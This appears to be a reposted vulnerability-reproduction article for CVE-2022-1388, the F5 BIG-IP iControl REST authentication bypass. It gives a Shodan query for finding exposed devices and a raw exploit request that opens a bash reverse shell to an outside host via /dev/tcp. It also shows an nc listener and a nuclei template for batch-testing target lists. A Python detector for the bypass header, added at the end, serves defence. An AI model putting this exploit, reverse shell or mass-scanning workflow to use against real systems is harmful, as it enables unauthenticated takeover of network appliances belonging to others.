CVE-2022-1388 F5 BIG-IP RCE

This article is reposted from the WeChat public account 融云攻防实验室; original link:

Vulnerability Reproduction: CVE-2022-1388 F5 BIG-IP RCE

0x01 Reader Notice

These resources come from the internet; 安全小天地 is only re-sharing them. Please follow this site's disclaimer when using them.

0x02 Vulnerability Description

F5 published a security advisory on its official site disclosing a remote code execution vulnerability in F5 BIG-IP (CVE-2022-1388). The vulnerability lies in the iControl REST component: an unauthenticated attacker can send requests that bypass iControl REST authentication in BIG-IP, and can then execute arbitrary system commands, create or delete files, or disable services on the target host.


0x03 Vulnerability Reproduction

Affected versions:

  • BIG-IP 16.x: 16.1.0 – 16.1.2
  • BIG-IP 15.x: 15.1.0 – 15.1.5
  • BIG-IP 14.x: 14.1.0 – 14.1.4
  • BIG-IP 13.x: 13.1.0 – 13.1.4
  • BIG-IP 12.x: 12.1.0 – 12.1.6
  • BIG-IP 11.x: 11.6.1 – 11.6.5
  • shodan: http.title:"BIG-IP®-+Redirect" +"Server"

1. Execute the reverse shell command

POST /mgmt/tm/util/bash HTTP/1.1
Host: x.x.x.x
Content-Length: 85
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0a
X-F5-Auth-Token: a
Authorization: Basic YWRtaW46xxxxx=

{\"command\":\"run\",
\"utilCmdArgs\":\"-c \'bash -i >& /dev/tcp/x.x.x.x/7777 0>&1\'\"}

2. Listen with nc to catch the shell

nc -lnvp 7777

3. Use nuclei to batch-verify whether the URLs in the file 1.txt are vulnerable; the output shows they are. (nuclei is stable and fast, PoCs are easy to write, and it is community-maintained, so it is recommended.)

nuclei download: https://github.com/projectdiscovery/nuclei

Batch verification command:
nuclei -list 1.txt -t CVE-2022-1388.yaml

YAML PoC:
id: CVE-2022-1388

info:
  name: F5 BIG-IP iControl REST Auth Bypass RCE
  author: dwisiswant0
  severity: critical
  description: |
    This vulnerability may allow an unauthenticated attacker
    with network access to the BIG-IP system through the management
    port and/or self IP addresses to execute arbitrary system commands,
    create or delete files, or disable services. There is no data plane
    exposure; this is a control plane issue only.
  reference:
    - https://twitter.com/GossiTheDog/status/1523566937414193153
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2022-1388
    cwe-id: CWE-306
  tags: cve

variables:
  auth: \"admin:\"

requests:
  - raw:
      - |
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive, X-F5-Auth-Token
        X-F5-Auth-Token: a
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json

        {
          \"command\": \"run\",
          \"utilCmdArgs\": \"-c \'echo ryaqkj\'\"
        }

    matchers:
      - type: word
        words:
          - \"commandResult\"
          - \"ryaqkj\"
        condition: and
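
As an added defender-side example that is not part of the original article or the nuclei project: the request shape shown in step 1 and in the template above can be recognised in captured requests by checking whether the Connection header names X-F5-Auth-Token on an /mgmt/ path. The hostnames, the token value and both sample requests are constructed for this example.

```python
from typing import Dict, List, Tuple
# Constructed sample requests (not captured traffic): one mirroring the request shape
# shown in this article, one ordinary token-authenticated iControl REST call.
EXPLOIT_SHAPED = (
    "POST /mgmt/tm/util/bash HTTP/1.1\r\n"
    "Host: bigip.example.internal\r\n"
    "Connection: keep-alive, X-F5-Auth-Token\r\n"
    "X-F5-Auth-Token: a\r\n"
    "Authorization: Basic YWRtaW46\r\n"
    "\r\n"
    '{"command": "run", "utilCmdArgs": "-c \'echo ryaqkj\'"}'
)
BENIGN = (
    "GET /mgmt/tm/ltm/pool HTTP/1.1\r\n"
    "Host: bigip.example.internal\r\n"
    "Connection: keep-alive\r\n"
    "X-F5-Auth-Token: PLACEHOLDER-SESSION-TOKEN\r\n"
    "\r\n"
)

def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.1 request into method, path and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers

def cve_2022_1388_indicators(raw: str) -> List[str]:
    """Return the CVE-2022-1388 request-shape indicators present in a raw request.
    Listing X-F5-Auth-Token in the hop-by-hop Connection header makes the front end drop
    the token before the back end checks auth; only the first indicator is decisive."""
    _method, path, headers = parse_request(raw)
    if not path.startswith("/mgmt/"):
        return []
    hits: List[str] = []
    conn = {t.strip().lower() for t in headers.get("connection", "").split(",")}
    if "x-f5-auth-token" in conn:
        hits.append("connection_lists_x_f5_auth_token")
    if headers.get("authorization", "").lower().startswith("basic "):
        hits.append("basic_auth_to_mgmt_api")
    if path.startswith("/mgmt/tm/util/bash"):
        hits.append("util_bash_endpoint")
    return hits

def is_bypass_attempt(raw: str) -> bool:
    return "connection_lists_x_f5_auth_token" in cve_2022_1388_indicators(raw)
```

A legitimate client may use Basic authentication or call /mgmt/tm/util/bash, so those two indicators only add context; the Connection header trick is what a WAF rule or log search should key on.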